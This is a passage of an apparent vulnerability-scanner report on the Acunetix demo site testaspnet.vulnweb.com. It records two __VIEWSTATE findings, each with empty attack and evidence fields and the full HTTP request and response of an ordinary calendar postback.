style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:White" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8590')" style="color:Black" title="July 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8591')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8592')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8593')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8594')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8595')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8596')" style="color:Black" title="July 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8597')" style="color:Black" title="July 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8598')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8599')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8600')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8601')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8602')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8603')" style="color:Black" title="July 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8604')" style="color:Black" title="July 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8605')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8606')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8607')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8608')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8609')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8610')" style="color:Black" title="July 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1181 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,181 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8583&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA%2FhzGedsIHgJTRBYBBgCAaEePetsIZGRkCEQdRmw8tgHs5RfgzOawa8KzZtw%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLQptDEBQKqztTQBQKM1crSCAKK%2Bb%2FgBQKK%2Bb%2FgBQKK%2BdOEDQKK%2BdOEDQKK%2BYfsCwKK%2BYfsCwKK%2BbuDAwKK%2BbuDAwK%2Fk%2BfECQK%2Fk%2BfECQK%2Fk5ubAQK%2Fk5ubAQK%2Fk4%2B%2BCgK%2Fk4%2B%2BCgK%2Fk6PVAwK%2Fk6PVAwK%2Fk9fpDAK%2Fk9fpDAK%2Fk8uMBAK%2Fk8uMBAK%2Fk%2F%2BjDQK%2Fk%2F%2BjDQK%2Fk5PGBgK%2Fk5PGBgK%2Fk8evAwK%2Fk8evAwK%2Fk%2FvCDAK%2Fk%2FvCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB%2BAkCkLqB%2BAkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ%2FKYDAtfZ%2FKYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ%2BPkCAtfZ%2BPkCAtfZ7JwKAtfZ7JwKAqjg%2FoUNAqjg%2FoUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCknk7%2FmN%2B67FTty2ZxkPBCY9N0%2B8
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:16:57 GMT Content-Length: 12461
Response Body - size: 12,461 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA/hzGedsIHgJTRBYBBgCAaEePetsIZGRkCEQdRmw8tgHs5RfgzOawa8KzZtw=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLQptDEBQKqztTQBQKM1crSCAKK+b/gBQKK+b/gBQKK+dOEDQKK+dOEDQKK+YfsCwKK+YfsCwKK+buDAwKK+buDAwK/k+fECQK/k+fECQK/k5ubAQK/k5ubAQK/k4++CgK/k4++CgK/k6PVAwK/k6PVAwK/k9fpDAK/k9fpDAK/k8uMBAK/k8uMBAK/k/+jDQK/k/+jDQK/k5PGBgK/k5PGBgK/k8evAwK/k8evAwK/k/vCDAK/k/vCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB+AkCkLqB+AkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ/KYDAtfZ/KYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ+PkCAtfZ+PkCAtfZ7JwKAtfZ7JwKAqjg/oUNAqjg/oUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCknk7/mN+67FTty2ZxkPBCY9N0+8" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8613')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:White" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8590')" style="color:Black" title="July 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8591')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8592')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8593')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8594')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8595')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8596')" style="color:Black" title="July 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8597')" style="color:Black" title="July 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8598')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8599')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8600')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8601')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8602')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8603')" style="color:Black" title="July 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8604')" style="color:Black" title="July 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8605')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8606')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8607')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8608')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8609')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8610')" style="color:Black" title="July 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1181 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,181 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8587&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA%2FhzGedsIHgJTRBYBBgCAD%2FGzfdsIZGRkuFLjAevVEEgOJTqJQoFbhcpLU6M%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKv1%2BHdCAKqztTQBQKM1crSCAKK%2Bb%2FgBQKK%2Bb%2FgBQKK%2BdOEDQKK%2BdOEDQKK%2BYfsCwKK%2BYfsCwKK%2BbuDAwKK%2BbuDAwK%2Fk%2BfECQK%2Fk%2BfECQK%2Fk5ubAQK%2Fk5ubAQK%2Fk4%2B%2BCgK%2Fk4%2B%2BCgK%2Fk6PVAwK%2Fk6PVAwK%2Fk9fpDAK%2Fk9fpDAK%2Fk8uMBAK%2Fk8uMBAK%2Fk%2F%2BjDQK%2Fk%2F%2BjDQK%2Fk5PGBgK%2Fk5PGBgK%2Fk8evAwK%2Fk8evAwK%2Fk%2FvCDAK%2Fk%2FvCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB%2BAkCkLqB%2BAkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ%2FKYDAtfZ%2FKYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ%2BPkCAtfZ%2BPkCAtfZ7JwKAtfZ7JwKAqjg%2FoUNAqjg%2FoUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCofLpjQYZOM5%2FpXJvtDbUPTtLEsG
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:28:38 GMT Content-Length: 12461
Response Body - size: 12,461 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA/hzGedsIHgJTRBYBBgCAD/GzfdsIZGRkuFLjAevVEEgOJTqJQoFbhcpLU6M=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKv1+HdCAKqztTQBQKM1crSCAKK+b/gBQKK+b/gBQKK+dOEDQKK+dOEDQKK+YfsCwKK+YfsCwKK+buDAwKK+buDAwK/k+fECQK/k+fECQK/k5ubAQK/k5ubAQK/k4++CgK/k4++CgK/k6PVAwK/k6PVAwK/k9fpDAK/k9fpDAK/k8uMBAK/k8uMBAK/k/+jDQK/k/+jDQK/k5PGBgK/k5PGBgK/k8evAwK/k8evAwK/k/vCDAK/k/vCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB+AkCkLqB+AkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ/KYDAtfZ/KYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ+PkCAtfZ+PkCAtfZ7JwKAtfZ7JwKAqjg/oUNAqjg/oUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCofLpjQYZOM5/pXJvtDbUPTtLEsG" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8613')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" 